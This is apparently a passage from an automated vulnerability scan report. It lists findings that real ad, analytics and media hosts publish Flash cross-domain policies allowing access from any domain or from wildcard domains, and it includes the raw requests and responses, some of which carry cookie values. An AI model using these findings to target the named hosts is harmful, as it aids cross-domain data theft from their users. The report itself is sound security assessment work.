Expires: Mon, 25 Apr 2011 14:37:04 GMT
Content-type: text/plain
Content-length: 288
Last-Modified: Mon, 14 Feb 2011 12:33:32 GMT

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" secure="true" />
<allow-ht
...[SNIP]...

6.15. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 619922229
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=931
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.16. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 25 Apr 2011 14:23:41 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

6.17. http://games.mochiads.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Content-Length: 213
Last-Modified: Thu, 21 Oct 2010 04:46:54 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
X-Mochi-Source: 10.0.0.238:27050
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-do
...[SNIP]...

6.18. http://goods.adnectar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwgAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.19. http://goods43.adnectar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goods43.adnectar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:29 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcFNKXjmCL4qAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.20. http://img.en25.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.en25.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 206
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.21. http://learn.shavlik.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:16:43 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.23. http://map.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://mbox5.offermatica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox5.offermatica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1302288767000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 18:52:47 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.25. http://pda.loveplanet.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pda.loveplanet.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:45 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://loveplanet.ru/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.26. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.27. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.28. http://pl.yumenetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Sun, 17 Aug 2008 20:39:50 GMT
ETag: "10d0439-122-454addb2bd180"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

6.29. http://playspal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://playspal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: playspal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 25 Apr 2011 14:54:27 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 23 Nov 2010 09:52:59 GMT
ETag: "9828d2a-68-4ceb8efb"
Accept-Ranges: bytes
Content-Length: 104

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.30. http://pretty.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pretty.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:34 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://loveplanet.ru/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.31. http://r2.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:54 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.32. http://rbcgaru.hit.gemius.pl/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/xml
Content-Length: 246

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://hit.gemius.pl -->
<cross-domain-policy>
   <allow-access-from domain="*" />
...[SNIP]...

6.33. http://rs.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.34. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 21:09:16 GMT
Expires: Thu, 21 Apr 2011 21:08:25 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 63651
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.35. http://search.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Cache-Control: max-age=1800
Expires: Mon, 25 Apr 2011 15:01:27 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 124651946 124570955
Age: 521
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-31-sr2.prod.twitter.com
X-Cache: HIT
X-Cache-Hits: 4
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.36. http://widgets.fotocash.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.fotocash.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.fotocash.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:29:10 GMT
Content-Type: text/xml
Content-Length: 138
Last-Modified: Thu, 21 Oct 2010 13:56:12 GMT
Connection: close
Expires: Wed, 25 May 2011 14:29:10 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.37. http://gomail.radar.imgsmail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gomail.radar.imgsmail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gomail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:51:42 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

6.38. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 24 Apr 2011 21:14:04 GMT
Expires: Mon, 25 Apr 2011 21:14:04 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53567
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.39. http://imagesrv.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 11 Jan 2010 19:57:11 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 250
ETag: "pv3dca051be9ba6a415f8df8e0b0d315af"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.U50F79C0A].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3bc17e06277dbf6b1363ce7f36ea10b3bb7b54d78751fcaa4db564e4; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
<allow-access-from domain="imagesrv" />
...[SNIP]...

6.40. http://img.dt00.net/crossdomain.xml  previous  next

Summary
